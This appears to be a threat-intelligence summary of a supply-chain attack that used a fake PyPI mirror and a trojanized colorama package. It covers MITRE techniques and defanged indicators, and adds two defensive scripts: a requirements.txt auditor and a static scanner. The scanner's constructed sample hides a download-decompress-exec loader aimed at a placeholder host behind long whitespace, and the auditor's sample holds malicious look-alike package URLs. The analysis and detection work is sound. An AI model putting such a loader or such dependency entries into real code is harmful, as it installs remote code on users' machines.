Keypoints
- Attackers registered typosquatted domains (e.g., files[.]pypihosted[.]org) and hosted a fake Python package mirror to serve malicious packages and a poisoned colorama.
- Malicious packages (notably yocolor) and modified requirements.txt entries directed pip to the fake mirror, enabling automatic installation of the trojanized colorama.
- High-reputation GitHub accounts were hijacked—likely via stolen browser cookies—and used to commit requirements changes pointing to the fake mirror, increasing trust and reach.
- The injected colorama contained hidden malicious code (whitespace padding, obfuscation) that fetched additional encrypted/obfuscated payloads from remote servers and executed them with Python.
- Final payload implemented persistence (registry run key), extensive data theft (browser cookies, Discord tokens, crypto wallets, Telegram sessions, files), keylogging, and exfiltration via web services (GoFile/Anonfiles and HTTP uploads).
- Attackers used evasion techniques (zlib compression, misleading variable names, non-ASCII strings) and blended malicious commits with legitimate files to avoid detection.
- Checkmarx reported abused domains and monitored the campaign; multiple malicious PyPI packages and sample package names were identified in the investigation.
MITRE Techniques
- [T1195.002] Compromise Software Dependencies and Development Tools – The attackers “deployed a fake Python packages mirror” and “poisoned copy of the popular package ‘colorama’”, using a malicious dependency to contaminate builds.
- [T1078] Valid Accounts – The adversary “hijack GitHub accounts with high reputations and use the resources under those accounts to contribute malicious commits,” leveraging compromised accounts to push malicious requirements.
- [T1105] Ingress Tool Transfer – The trojanized package “fetches and executes another piece of Python code from ‘hxxps[:]//pypihosted[.]org/version,’” downloading additional payloads from attacker-controlled servers.
- [T1059.006] Command and Scripting Interpreter: Python – The attack uses Python to run downloaded code and executes fetched obfuscated snippets via ‘exec’ to carry out subsequent stages.
- [T1027] Obfuscated Files or Information – The actor “used a significant amount of whitespace to push the malicious code off-screen” and applied zlib compression and misleading names to hide malicious logic.
- [T1547.001] Boot or Logon Autostart Execution: Registry Run Keys/Startup Folder – The malware achieves persistence by “modifying the Windows registry to create a new run key” so the payload runs on reboot.
- [T1555.003] Credentials from Web Browsers – The final payload harvests “cookies, autofill information, browsing history, bookmarks, credit cards, and login credentials” from multiple browsers to obtain credentials and session tokens.
- [T1056.001] Input Capture: Keylogging – The malicious final payload includes a “keylogging component” that records keystrokes and uploads the logs to the attacker’s server.
- [T1567] Exfiltration Over Web Service – Stolen data is uploaded to anonymous file-sharing services and sent over HTTP; the report notes use of “GoFile and Anonfiles” and HTTP uploads to attacker infrastructure.
Indicators of Compromise
- [Malicious package URL] Fake PyPI mirror packages – hxxps[:]//files[.]pypihosted[.]org/…/colorama-0.4.6.tar.gz, hxxps[:]//files[.]pythanhosted[.]org/…/colorama-0.4.5.tar.gz
- [Domains] Typosquatted mirrors and endpoints – files[.]pypihosted[.]org, pypihosted[.]org/version
- [IP addresses] Remote payload and C2 hosts – 162[.]248[.]100[.]217, 162[.]248[.]101[.]215
- [Package names] Malicious PyPI packages used for delivery – yocolor (0.4.6), and trojanized colorama
- [File hashes] Example package/file hashes observed – 0C1873196DBD88280F4D5CF409B7B53674B3ED85F8A1A28ECE9CAF2F98A71207, 35AC61C83B85F6DDCF8EC8747F44400399CE3A9986D355834B68630270E669FB (and 1 more hash)
The attackers set up a typosquatted Python package mirror (e.g., files[.]pypihosted[.]org) and published malicious packages—most notably a trojanized copy of colorama delivered via a PyPI package named yocolor and by inserting malicious dependency URLs into requirements.txt files. They exploited pip’s ability to fetch packages from arbitrary URLs so that when projects installed dependencies, pip downloaded the poisoned colorama from the fake mirror instead of the legitimate index.
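The delivery vector above relies on pip accepting direct URLs and alternative indexes from requirements.txt, so a project can audit its own requirements for entries that route pip away from the official index. The script below is an added example written for this page, not code from the Checkmarx report: the host allowlist, the look-alike distance threshold and the sample requirements text are constructed assumptions (the sample reuses the report's defanged hosts in plain form so the checks have something to flag).

```python
"""Audit a requirements.txt for dependencies that bypass the official index.

Added example (not from the Checkmarx report). Flags every direct-URL
requirement and every --index-url/--extra-index-url/--find-links option,
records whether the host is on an allowlist, and reports hosts that are a
small edit away from a trusted host (typosquats).
"""
import re
from urllib.parse import urlparse

# Assumption: the hosts this organisation permits pip to download from.
ALLOWED_HOSTS = {"pypi.org", "files.pythonhosted.org"}
# Assumption: hosts within this many edits of a trusted host are look-alikes.
LOOKALIKE_MAX_DISTANCE = 2

URL_RE = re.compile(r"https?://[^\s#'\"]+")
INDEX_OPTION_RE = re.compile(r"^(?:-i|--index-url|--extra-index-url|-f|--find-links)\b")


def edit_distance(a: str, b: str) -> int:
    """Levenshtein distance between two strings (classic DP, one row at a time)."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def closest_lookalike(host: str):
    """Return the trusted host that `host` most resembles, or None if it is
    either identical to a trusted host or too different to be a typosquat."""
    best = min(ALLOWED_HOSTS, key=lambda h: edit_distance(host, h))
    distance = edit_distance(host, best)
    return best if 0 < distance <= LOOKALIKE_MAX_DISTANCE else None


def audit_requirements(text: str) -> list:
    """Return one finding per URL that appears in the requirements text."""
    findings = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        # pip treats '#' at line start or after whitespace as a comment marker
        line = re.sub(r"(^|\s)#.*$", "", raw).strip()
        if not line:
            continue
        kind = "index_option" if INDEX_OPTION_RE.match(line) else "direct_url"
        for url in URL_RE.findall(line):
            host = (urlparse(url).hostname or "").lower()
            findings.append({
                "line": lineno,
                "kind": kind,
                "host": host,
                "allowed": host in ALLOWED_HOSTS,
                "lookalike_of": closest_lookalike(host),
            })
    return findings


# Constructed sample: a requirements file that mixes a normal pin with the
# kinds of entries the report describes.
SAMPLE_REQUIREMENTS = """\
requests==2.31.0
# the next line pins colorama to a look-alike of files.pythonhosted.org
colorama @ https://files.pythanhosted.org/packages/colorama-0.4.5.tar.gz
--extra-index-url https://pypi.org/simple
https://files.pypihosted.org/packages/colorama-0.4.6.tar.gz
"""

if __name__ == "__main__":
    for finding in audit_requirements(SAMPLE_REQUIREMENTS):
        status = "ok" if finding["allowed"] else "NOT ALLOWLISTED"
        note = f" (looks like {finding['lookalike_of']})" if finding["lookalike_of"] else ""
        print(f"line {finding['line']}: {finding['kind']} -> {finding['host']}: {status}{note}")
```

Run as a pre-merge check, any finding with `allowed == False` should block the change; a non-empty `lookalike_of` is the strongest signal, since a host one edit away from files.pythonhosted.org has no legitimate reason to appear in a requirements file.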
Inside the trojanized colorama the adversary concealed a small malicious bootstrap (initially in colorama/tests/__init__.py, later moved to colorama/__init__.py) using heavy whitespace padding to hide the code from cursory inspection. That bootstrap fetches encrypted/obfuscated Python code from pypihosted[.]org/version and additional payloads from IPs such as 162[.]248[.]100[.]217/inj, decrypts and decompresses them, and executes them via Python (exec). Obfuscation techniques included zlib compression, non-ASCII strings, and misleading variable names to complicate analysis.
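Each of the hiding techniques described above (code pushed off-screen by horizontal whitespace, exec fed by decoded or decompressed data fetched over the network, non-ASCII strings) leaves a pattern that a static scan of installed package sources can pick up. The scanner below is an added example written for this page, not code from the Checkmarx report or the colorama project; the padding threshold, the call-name lists, and the constructed sample module (including its example.invalid URL) are assumptions, and the verdict rule simply marks a file for manual review rather than claiming it is malicious.

```python
"""Static scan of a Python source file for the hiding patterns described
in the report. Added example, not the report's or colorama's code."""
import ast
import re

# Assumption: a run of this many spaces between two tokens on one line is
# enough to push the trailing code past the edge of a normal editor window.
PAD_THRESHOLD = 200
PADDING_RE = re.compile(r"\S {%d,}\S" % PAD_THRESHOLD)

# Assumption: call names worth correlating. Any one alone is common; the
# combination exec + decoder + fetch on the same file is what is unusual.
EXEC_CALLS = {"exec", "eval", "compile", "__import__"}
DECODER_CALLS = {"decompress", "b64decode", "unhexlify", "fromhex", "a85decode"}
FETCH_CALLS = {"urlopen", "urlretrieve", "get", "post"}


def _call_name(node: ast.Call) -> str:
    """Name of the callee: `exec(...)` -> 'exec', `zlib.decompress(...)` -> 'decompress'."""
    func = node.func
    if isinstance(func, ast.Name):
        return func.id
    if isinstance(func, ast.Attribute):
        return func.attr
    return ""


def scan_source(source: str) -> dict:
    """Return per-category lists of line numbers (1-based) that hit each pattern."""
    report = {
        "padded_lines": [], "non_ascii_lines": [],
        "exec_lines": [], "decoder_lines": [], "fetch_lines": [],
        "syntax_error": False,
    }
    # Line-based checks work even when the file does not parse.
    for lineno, line in enumerate(source.splitlines(), 1):
        if PADDING_RE.search(line):
            report["padded_lines"].append(lineno)
        if any(ord(ch) > 127 for ch in line):
            report["non_ascii_lines"].append(lineno)
    # AST-based checks classify every call by its callee name.
    try:
        tree = ast.parse(source)
    except SyntaxError:
        report["syntax_error"] = True
        return report
    for node in ast.walk(tree):
        if not isinstance(node, ast.Call):
            continue
        name = _call_name(node)
        if name in EXEC_CALLS:
            report["exec_lines"].append(node.lineno)
        elif name in DECODER_CALLS:
            report["decoder_lines"].append(node.lineno)
        elif name in FETCH_CALLS:
            report["fetch_lines"].append(node.lineno)
    for key in ("exec_lines", "decoder_lines", "fetch_lines"):
        report[key] = sorted(set(report[key]))
    return report


def is_suspicious(report: dict) -> bool:
    """Review rule (assumption): off-screen padding on its own, or a dynamic
    exec in a file that also decodes or fetches data, warrants a manual look."""
    if report["padded_lines"]:
        return True
    return bool(report["exec_lines"] and (report["decoder_lines"] or report["fetch_lines"]))


# Constructed sample that mimics the bootstrap shape: a harmless-looking
# module with the loader hidden after 400 spaces on the `def init()` line.
BOOTSTRAP_TAIL = (
    ";exec(zlib.decompress(base64.b64decode("
    "urllib.request.urlopen('http://example.invalid/version').read())))"
)
SAMPLE_MODULE = "\n".join([
    "from .ansi import Fore",
    "import zlib, base64, urllib.request",
    "def init(): pass" + " " * 400 + BOOTSTRAP_TAIL,
    "label = 'ｃｏｌｏｒａｍａ'",   # full-width Latin letters: non-ASCII decoy string
]) + "\n"

if __name__ == "__main__":
    result = scan_source(SAMPLE_MODULE)
    for key, value in result.items():
        print(f"{key}: {value}")
    print("verdict:", "REVIEW" if is_suspicious(result) else "clean")
```

Point `scan_source` at every `.py` file under a fresh virtual environment's site-packages after installing from a lock file; files that hit the padding pattern or the exec-plus-decoder/fetch combination are the ones to diff against the package's source repository.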
The staged payload installs persistence by creating registry run keys, then deploys a final data-stealing module that enumerates browsers and applications (Chrome/Edge/Brave/Vivaldi/Opera/Yandex, Discord, Telegram, multiple crypto wallets), extracts cookies, tokens, wallet files, Telegram sessions, and user files, captures keystrokes, compresses exfiltrated artifacts, and uploads them to attacker-controlled endpoints and public file-sharing services (e.g., GoFile/Anonfiles) via HTTP. Compromised GitHub accounts (likely via stolen session cookies) were used to insert malicious requirements into trusted repositories, amplifying distribution and impact.
Read more: https://checkmarx.com/blog/over-170k-users-affected-by-attack-using-fake-python-infrastructure/